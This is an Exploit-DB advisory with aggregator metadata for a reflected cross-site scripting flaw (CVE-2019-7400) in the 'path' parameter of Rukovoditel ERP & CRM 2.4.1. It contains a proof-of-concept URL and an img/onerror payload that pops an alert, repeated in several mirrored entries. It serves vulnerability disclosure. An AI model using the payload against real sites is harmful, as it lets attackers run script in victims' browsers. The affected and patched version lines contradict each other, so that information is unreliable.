ID EDB-ID:46608
Type exploitdb
Reporter Exploit-DB
Modified 2019-03-26T00:00:00
Description
# Exploit Title: Rukovoditel ERP & CRM 2.4.1 - 'path' Cross-Site Scripting
# Exploit Author: Javier Olmedo
# Website: https://hackpuntes.com
# Date: 2019-03-24
# Google Dork: N/A
# Vendor: Rukovoditel
# Software Link: https://sourceforge.net/projects/rukovoditel/
# Affected Version: 2.4.1 and possibly before (as stated by the author; note that the NVD entry for CVE-2019-7400 reads "Rukovoditel before 2.4.1 allows XSS", so the sources disagree on whether 2.4.1 itself is affected - confirm against the vendor changelog before reporting or closing a finding)
# Patched Version: patched in extension version 2.4.1 (this contradicts the "Affected Version" line above; treat the affected/fixed boundary as unverified)
# Category: Web Application
# Platform: Windows (as tested; Rukovoditel is a PHP web application, so the issue is not expected to be OS-specific)
# Tested on: Win10x64 & Kali Linux
# CVE: CVE-2019-7400
# References:
# https://hackpuntes.com/cve-2019-7400-rukovoditel-erp-crm-2-4-1-cross-site-scripting-reflejado/
# 1. Technical Description:
# The `path` GET parameter of index.php (reached via module=items/items) is reflected into the
# HTML response without output encoding, giving Reflected Cross-Site Scripting (CWE-79). The
# payload's leading `">` suggests the value lands inside an HTML attribute: it closes that
# attribute and element, then injects an <img> whose onerror handler runs attacker-controlled
# JavaScript in the victim's browser. Exploitation requires the victim to open a crafted link
# (user interaction); the advisory does not state whether an authenticated session is needed
# to reach this module. Remediation: HTML-encode the parameter on output (e.g. htmlspecialchars
# with ENT_QUOTES) and validate it against the expected path format before use.
# 2. Proof Of Concept (PoC):
# http://localhost/index.php?module=items/items&path=%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22VULNERABLE%22)%3E
# 3. Payload
# "><img src=a onerror=alert("VULNERABLE")>
{"id": "EDB-ID:46608", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Rukovoditel ERP & CRM 2.4.1 - 'path' Cross-Site Scripting", "description": "", "published": "2019-03-26T00:00:00", "modified": "2019-03-26T00:00:00", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "href": "https://www.exploit-db.com/exploits/46608", "reporter": "Exploit-DB", "references": [], "cvelist": ["CVE-2019-7400"], "lastseen": "2019-03-26T17:36:28", "viewCount": 8, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2019-7400"]}, {"type": "zdt", "idList": ["1337DAY-ID-32428"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:E920C4222BD36FD80A591263B5255D10"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:152248"]}], "modified": "2019-03-26T17:36:28", "rev": 2}, "score": {"value": 4.1, "vector": "NONE", "modified": "2019-03-26T17:36:28", "rev": 2}, "vulnersScore": 4.1}, "sourceHref": "https://www.exploit-db.com/download/46608", "sourceData": "# Exploit Title: Rukovoditel ERP & CRM 2.4.1 - 'path' Cross-Site Scripting\r\n# Exploit Author: Javier Olmedo\r\n# Website: https://hackpuntes.com\r\n# Date: 2019-03-24\r\n# Google Dork: N/A\r\n# Vendor: Rukovoditel\r\n# Software Link: https://sourceforge.net/projects/rukovoditel/\r\n# Affected Version: 2.4.1 and possibly before\r\n# Patched Version: patched in extension version 2.4.1\r\n# Category: Web Application\r\n# Platform: Windows\r\n# Tested on: Win10x64 & Kali Linux\r\n# CVE: 2019-7400\r\n# References:\r\n# https://hackpuntes.com/cve-2019-7400-rukovoditel-erp-crm-2-4-1-cross-site-scripting-reflejado/\r\n\r\n# 1. Technical Description:\r\n# path parameter is vulnerable to Reflected Cross-Site Scripting (XSS) attacks\r\n# through a GET request in index.php resource.\r\n \r\n# 2. Proof Of Concept (PoC):\r\n# http://localhost/index.php?module=items/items&path=%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22VULNERABLE%22)%3E\r\n\r\n# 3. 
Payload\r\n# \"><img src=a onerror=alert(\"VULNERABLE\")>", "osvdbidlist": []}
{"cve": [{"lastseen": "2020-12-09T21:41:56", "description": "Rukovoditel before 2.4.1 allows XSS.", "edition": 6, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2019-02-05T06:29:00", "title": "CVE-2019-7400", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-7400"], "modified": "2019-04-01T22:29:00", "cpe": [], "id": "CVE-2019-7400", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-7400", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}], "zdt": [{"lastseen": "2019-03-30T17:24:52", "description": "Exploit for php platform in category web applications", "edition": 1, "published": "2019-03-27T00:00:00", "title": "Rukovoditel ERP & CRM 2.4.1 - path Cross-Site Scripting Vulnerability", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-7400"], "modified": "2019-03-27T00:00:00", "id": "1337DAY-ID-32428", "href": "https://0day.today/exploit/description/32428", "sourceData": "# Exploit Title: Rukovoditel ERP & CRM 2.4.1 - 'path' Cross-Site Scripting\r\n# Exploit Author: Javier Olmedo\r\n# Website: 
https://hackpuntes.com\r\n# Vendor: Rukovoditel\r\n# Software Link: https://sourceforge.net/projects/rukovoditel/\r\n# Affected Version: 2.4.1 and possibly before\r\n# Patched Version: patched in extension version 2.4.1\r\n# Category: Web Application\r\n# Platform: Windows\r\n# Tested on: Win10x64 & Kali Linux\r\n# CVE: 2019-7400\r\n# References:\r\n# https://hackpuntes.com/cve-2019-7400-rukovoditel-erp-crm-2-4-1-cross-site-scripting-reflejado/\r\n\r\n# 1. Technical Description:\r\n# path parameter is vulnerable to Reflected Cross-Site Scripting (XSS) attacks\r\n# through a GET request in index.php resource.\r\n \r\n# 2. Proof Of Concept (PoC):\r\n# http://localhost/index.php?module=items/items&path=%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22VULNERABLE%22)%3E\r\n\r\n# 3. Payload\r\n# \"><img src=a onerror=alert(\"VULNERABLE\")>\n\n# 0day.today [2019-03-30] #", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://0day.today/exploit/32428"}], "packetstorm": [{"lastseen": "2019-03-28T22:53:29", "description": "", "published": "2019-03-27T00:00:00", "type": "packetstorm", "title": "Rukovoditel ERP And CRM 2.4.1 Cross Site Scripting", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-7400"], "modified": "2019-03-27T00:00:00", "id": "PACKETSTORM:152248", "href": "https://packetstormsecurity.com/files/152248/Rukovoditel-ERP-And-CRM-2.4.1-Cross-Site-Scripting.html", "sourceData": "`# Exploit Title: Rukovoditel ERP & CRM 2.4.1 - 'path' Cross-Site Scripting \n# Exploit Author: Javier Olmedo \n# Website: https://hackpuntes.com \n# Date: 2019-03-24 \n# Google Dork: N/A \n# Vendor: Rukovoditel \n# Software Link: https://sourceforge.net/projects/rukovoditel/ \n# Affected Version: 2.4.1 and possibly before \n# Patched Version: patched in extension version 2.4.1 \n# Category: Web Application \n# Platform: Windows \n# Tested on: Win10x64 & Kali Linux \n# CVE: 2019-7400 \n# References: \n# 
https://hackpuntes.com/cve-2019-7400-rukovoditel-erp-crm-2-4-1-cross-site-scripting-reflejado/ \n \n# 1. Technical Description: \n# path parameter is vulnerable to Reflected Cross-Site Scripting (XSS) attacks \n# through a GET request in index.php resource. \n \n# 2. Proof Of Concept (PoC): \n# http://localhost/index.php?module=items/items&path=%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22VULNERABLE%22)%3E \n \n# 3. Payload \n# \"><img src=a onerror=alert(\"VULNERABLE\")> \n`\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/152248/rukovoditelerpcrm241-xss.txt"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:46", "description": "\nRukovoditel ERP CRM 2.4.1 - path Cross-Site Scripting", "edition": 1, "published": "2019-03-26T00:00:00", "title": "Rukovoditel ERP CRM 2.4.1 - path Cross-Site Scripting", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-7400"], "modified": "2019-03-26T00:00:00", "id": "EXPLOITPACK:E920C4222BD36FD80A591263B5255D10", "href": "", "sourceData": "# Exploit Title: Rukovoditel ERP & CRM 2.4.1 - 'path' Cross-Site Scripting\n# Exploit Author: Javier Olmedo\n# Website: https://hackpuntes.com\n# Date: 2019-03-24\n# Google Dork: N/A\n# Vendor: Rukovoditel\n# Software Link: https://sourceforge.net/projects/rukovoditel/\n# Affected Version: 2.4.1 and possibly before\n# Patched Version: patched in extension version 2.4.1\n# Category: Web Application\n# Platform: Windows\n# Tested on: Win10x64 & Kali Linux\n# CVE: 2019-7400\n# References:\n# https://hackpuntes.com/cve-2019-7400-rukovoditel-erp-crm-2-4-1-cross-site-scripting-reflejado/\n\n# 1. Technical Description:\n# path parameter is vulnerable to Reflected Cross-Site Scripting (XSS) attacks\n# through a GET request in index.php resource.\n \n# 2. 
Proof Of Concept (PoC):\n# http://localhost/index.php?module=items/items&path=%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22VULNERABLE%22)%3E\n\n# 3. Payload\n# \"><img src=a onerror=alert(\"VULNERABLE\")>", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}]}